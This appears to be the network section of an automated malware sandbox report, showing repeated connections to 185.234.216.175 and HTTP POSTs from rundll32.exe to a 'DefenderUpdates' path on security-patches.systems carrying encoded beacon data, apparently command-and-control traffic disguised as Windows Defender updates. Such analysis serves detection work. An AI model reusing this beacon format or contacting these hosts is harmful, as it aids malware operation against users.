                                            Dec 6, 2024 22:12:26.317773104 CET498044443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:26.319221973 CET498044443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:26.439771891 CET444349804185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:27.810983896 CET444349804185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:27.812638044 CET498044443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:27.933309078 CET444349804185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:27.933432102 CET498044443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:27.948862076 CET498054443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:28.068922043 CET444349805185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:28.068991899 CET498054443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:28.070610046 CET498054443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:28.190299034 CET444349805185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:29.530549049 CET444349805185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:29.532218933 CET498054443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:29.653418064 CET444349805185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:29.653521061 CET498054443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:29.666939020 CET498064443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:29.786786079 CET444349806185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:29.786873102 CET498064443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:29.788479090 CET498064443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:29.908390045 CET444349806185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:31.262608051 CET444349806185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:31.265491009 CET498064443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:31.385735989 CET444349806185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:31.386919022 CET498064443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:31.405193090 CET498074443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:31.525068045 CET444349807185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:31.527930021 CET498074443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:31.530654907 CET498074443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:31.650825024 CET444349807185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:32.980957031 CET444349807185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:32.983186007 CET498074443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:33.103393078 CET444349807185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:33.103481054 CET498074443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:33.297103882 CET498084443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:33.418946981 CET444349808185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:33.419069052 CET498084443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:33.420878887 CET498084443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:33.540685892 CET444349808185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:34.861421108 CET444349808185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:34.863280058 CET498084443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:34.983468056 CET444349808185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:34.983520985 CET498084443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:34.995246887 CET498094443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:35.115051985 CET444349809185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:35.115250111 CET498094443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:35.118546009 CET498094443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:35.238431931 CET444349809185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:36.581568956 CET444349809185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:36.583081961 CET498094443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:36.703250885 CET444349809185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:36.703377962 CET498094443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:36.713696957 CET498104443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:36.833673954 CET444349810185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:36.833792925 CET498104443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:36.835350037 CET498104443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:36.955240011 CET444349810185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:38.320646048 CET444349810185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:38.322499037 CET498104443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:38.442548990 CET444349810185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:38.442656994 CET498104443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:38.464745998 CET498114443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:38.584522963 CET444349811185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:38.584633112 CET498114443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:38.586344957 CET498114443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:38.706299067 CET444349811185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:40.049025059 CET444349811185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:40.050652027 CET498114443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:40.170913935 CET444349811185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:40.171005964 CET498114443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:40.181567907 CET498124443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:40.301713943 CET444349812185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:40.301799059 CET498124443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:40.303375959 CET498124443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:40.423255920 CET444349812185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:41.752965927 CET444349812185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:41.754374981 CET498124443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:41.874654055 CET444349812185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:41.874711037 CET498124443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:41.888622999 CET498134443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:42.008572102 CET444349813185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:42.008742094 CET498134443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:42.010320902 CET498134443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:42.130141973 CET444349813185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:43.454627037 CET444349813185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:43.456787109 CET498134443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:43.577188015 CET444349813185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:43.579894066 CET498134443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:43.588712931 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:43.708599091 CET444349814185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:43.711924076 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:43.713587999 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:43.833410025 CET444349814185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:45.175491095 CET444349814185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:45.225343943 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.231209040 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.351207018 CET444349814185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:45.351262093 CET498144443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.383690119 CET498154443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.503724098 CET444349815185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:45.503803968 CET498154443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.505367994 CET498154443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:45.625320911 CET444349815185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:47.275989056 CET444349815185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:47.277597904 CET498154443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:47.397813082 CET444349815185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:47.398031950 CET498154443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:47.422638893 CET498164443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:47.543488026 CET444349816185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:47.543625116 CET498164443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:47.545623064 CET498164443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:47.666631937 CET444349816185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:49.003232956 CET444349816185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:49.004906893 CET498164443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:49.125407934 CET444349816185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:49.125534058 CET498164443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:49.135680914 CET498174443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:49.255688906 CET444349817185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:49.255774021 CET498174443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:49.257334948 CET498174443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:49.377068996 CET444349817185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:50.724167109 CET444349817185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:50.725693941 CET498174443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:50.845798016 CET444349817185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:50.845907927 CET498174443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:50.870230913 CET498184443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:50.990240097 CET444349818185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:50.990473032 CET498184443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:50.991919041 CET498184443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:51.111668110 CET444349818185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:52.439371109 CET444349818185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:52.443460941 CET498184443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:52.563607931 CET444349818185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:52.564241886 CET498184443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:52.588279009 CET498194443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:52.708102942 CET444349819185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:52.709635973 CET498194443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:52.711251974 CET498194443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:52.831104994 CET444349819185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:54.170114994 CET444349819185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:54.171680927 CET498194443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:54.291938066 CET444349819185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:54.292133093 CET498194443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:54.305282116 CET498204443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:54.425110102 CET444349820185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:54.425193071 CET498204443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:54.426835060 CET498204443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:54.546648979 CET444349820185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:55.877197027 CET444349820185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:55.878561020 CET498204443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:55.999680042 CET444349820185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:55.999797106 CET498204443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:56.008074045 CET498214443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:56.127909899 CET444349821185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:56.128047943 CET498214443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:56.129458904 CET498214443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:56.249191046 CET444349821185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:57.580692053 CET444349821185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:57.582312107 CET498214443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:57.702579021 CET444349821185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:57.702675104 CET498214443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:57.714452982 CET498224443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:57.834192038 CET444349822185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:57.834294081 CET498224443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:57.835892916 CET498224443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:57.955820084 CET444349822185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:59.294399977 CET444349822185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:59.296108007 CET498224443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:59.416610956 CET444349822185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:59.416711092 CET498224443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:59.432818890 CET498234443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:59.552583933 CET444349823185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:59.552661896 CET498234443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:59.554130077 CET498234443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:59.674082041 CET444349823185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:00.998343945 CET444349823185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:01.000220060 CET498234443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:01.120568037 CET444349823185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:01.120692968 CET498234443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:01.151335001 CET498244443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:01.271226883 CET444349824185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:01.271492958 CET498244443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:01.273061991 CET498244443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:01.393234015 CET444349824185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:02.758141041 CET444349824185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:02.759855986 CET498244443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:02.880177975 CET444349824185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:02.880248070 CET498244443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:02.902131081 CET498254443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:03.022102118 CET444349825185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:03.022222996 CET498254443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:03.080204964 CET498254443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:03.200234890 CET444349825185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:04.500267029 CET444349825185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:04.503164053 CET498254443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:04.623913050 CET444349825185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:04.623970032 CET498254443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:04.635498047 CET498264443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:04.755306005 CET444349826185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:04.755412102 CET498264443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:04.756861925 CET498264443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:04.876600027 CET444349826185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:06.207870960 CET444349826185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:06.209502935 CET498264443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:06.329703093 CET444349826185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:06.329896927 CET498264443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:06.354526997 CET498274443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:06.474365950 CET444349827185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:06.474463940 CET498274443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:06.476110935 CET498274443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:06.595948935 CET444349827185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:07.931963921 CET444349827185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:07.933530092 CET498274443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:08.053797960 CET444349827185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:08.053898096 CET498274443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:08.094630003 CET498284443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:08.214447021 CET444349828185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:08.214576960 CET498284443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:08.219103098 CET498284443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:08.338836908 CET444349828185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:09.700627089 CET444349828185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:09.702228069 CET498284443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:09.822844028 CET444349828185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:09.825898886 CET498284443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:09.837709904 CET498294443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:09.958017111 CET444349829185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:09.958117962 CET498294443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:09.959602118 CET498294443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:10.080177069 CET444349829185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:11.124970913 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:11.125020981 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:11.125097990 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:11.126507998 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:11.126523018 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:11.500988960 CET444349829185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:11.502665997 CET498294443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:11.623375893 CET444349829185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:11.625911951 CET498294443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:12.689879894 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:12.689944983 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:12.693268061 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:12.693279982 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:12.693509102 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:12.693701982 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:12.694941044 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:12.735338926 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:13.253110886 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:13.253130913 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:13.253950119 CET49830443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:13:13.253979921 CET44349830185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:13:13.255824089 CET49830443192.168.2.5185.234.216.175
                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 6, 2024 22:11:02.704314947 CET6346753192.168.2.51.1.1.1
                                            Dec 6, 2024 22:11:03.056318045 CET53634671.1.1.1192.168.2.5
                                            Dec 6, 2024 22:11:08.202208042 CET5721953192.168.2.51.1.1.1
                                            Dec 6, 2024 22:11:08.340694904 CET53572191.1.1.1192.168.2.5
                                            Dec 6, 2024 22:11:33.020859957 CET6481453192.168.2.51.1.1.1
                                            Dec 6, 2024 22:11:33.159064054 CET53648141.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 6, 2024 22:11:02.704314947 CET192.168.2.51.1.1.10xca3bStandard query (0)axizlhop.lifeA (IP address)IN (0x0001)false
                                            Dec 6, 2024 22:11:08.202208042 CET192.168.2.51.1.1.10x9c42Standard query (0)security-patches.systemsA (IP address)IN (0x0001)false
                                            Dec 6, 2024 22:11:33.020859957 CET192.168.2.51.1.1.10x79deStandard query (0)security-patches.systemsA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 6, 2024 22:11:03.056318045 CET1.1.1.1192.168.2.50xca3bNo error (0)axizlhop.life104.21.40.3A (IP address)IN (0x0001)false
                                            Dec 6, 2024 22:11:03.056318045 CET1.1.1.1192.168.2.50xca3bNo error (0)axizlhop.life172.67.172.216A (IP address)IN (0x0001)false
                                            Dec 6, 2024 22:11:08.340694904 CET1.1.1.1192.168.2.50x9c42No error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false
                                            Dec 6, 2024 22:11:33.159064054 CET1.1.1.1192.168.2.50x79deNo error (0)security-patches.systems185.234.216.175A (IP address)IN (0x0001)false
                                            • axizlhop.life
                                            • security-patches.systems
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549733185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:33.293389082 CET741OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 525
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6e 4e 30 56 32 67 31 54 30 5a 4d 51 32 31 50 61 57 35 34 64 7a 30 69 4c 43 4a 47 63 33 52 4d 49 6a 6f 69 63 54 68 79 54 6a 64 77 54 58 42 43 62 6b 74 70 4b 32 31 6e 52 58 5a 44 62 6c 4e 79 61 45 45 39 49 69 77 69 53 47 52 57 55 58 42 42 49 6a 6f 69 63 69 38 72 52 6a 5a 6a 51 6a 4a 4d 56 6c 68 71 49 69 77 69 55 55 5a 61 65 57 6c 70 56 56 68 5a 49 6a 6f 69 4d 6d 4a 32 56 57 35 61 55 58 6b 69 4c 43 4a 53 59 6d 39 30 49 6a 6f 69 64 57 4e 68 65 54 51 72 51 6c 64 44 4d 6c 68 6d 49 69 77 69 55 32 4a 61 56 32 35 59 49 6a 6f 69 4d 7a 64 71 55 6d 31 61 56 58 63 69 4c 43 4a 5a 61 30 70 58 49 6a 70 62 49 6e 52 50 61 55 77 69 58 53 77 69 59 32 5a 4c 57 43 49 36 49 6a 4a 6e 50 54 30 69 4c 43 4a 6f 54 6d 39 32 53 6d 30 69 4f 69 4a 77 4b 32 56 56 65 6d 4e 7a 63 30 5a 6f 62 58 5a 71 52 45 4a 69 4e 6c 56 58 63 6d 39 42 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 4a 71 4b 31 64 48 65 44 68 73 4d 79 49 73 49 6e 4e 30 64 56 6b 69 4f 69 49 78 63 6d 70 61 62 [TRUNCATED]
                                            Data Ascii: data=eyJBbldGaCI6InN0V2g1T0ZMQ21PaW54dz0iLCJGc3RMIjoicThyTjdwTXBCbktpK21nRXZDblNyaEE9IiwiSGRWUXBBIjoici8rRjZjQjJMVlhqIiwiUUZaeWlpVVhZIjoiMmJ2VW5aUXkiLCJSYm90IjoidWNheTQrQldDMlhmIiwiU2JaV25YIjoiMzdqUm1aVXciLCJZa0pXIjpbInRPaUwiXSwiY2ZLWCI6IjJnPT0iLCJoTm92Sm0iOiJwK2VVemNzc0ZobXZqREJiNlVXcm9BPT0iLCJvQnVNVXUiOiJqK1dHeDhsMyIsInN0dVkiOiIxcmpabVE9PSIsInZvSmMiOiJtT2FxeXc9PSIsIndBY0giOiJxT0NPeWNzM2FnPT0iLCJ3UWVSSCI6IjJMM0E2czV3IiwieGVDY2pTIjoidS9xRjJnPT0iLCJ5aWlVWFkiOiJyYk84Lzg1cUlGLzR2QU42OVI2b29uNVRrd2w3ZGJvanhoUXdTVmdYRWdJPSJ9
                                            Dec 6, 2024 22:11:34.878926992 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:34 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549739185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:35.035471916 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:36.501916885 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:36 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549741185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:36.757502079 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
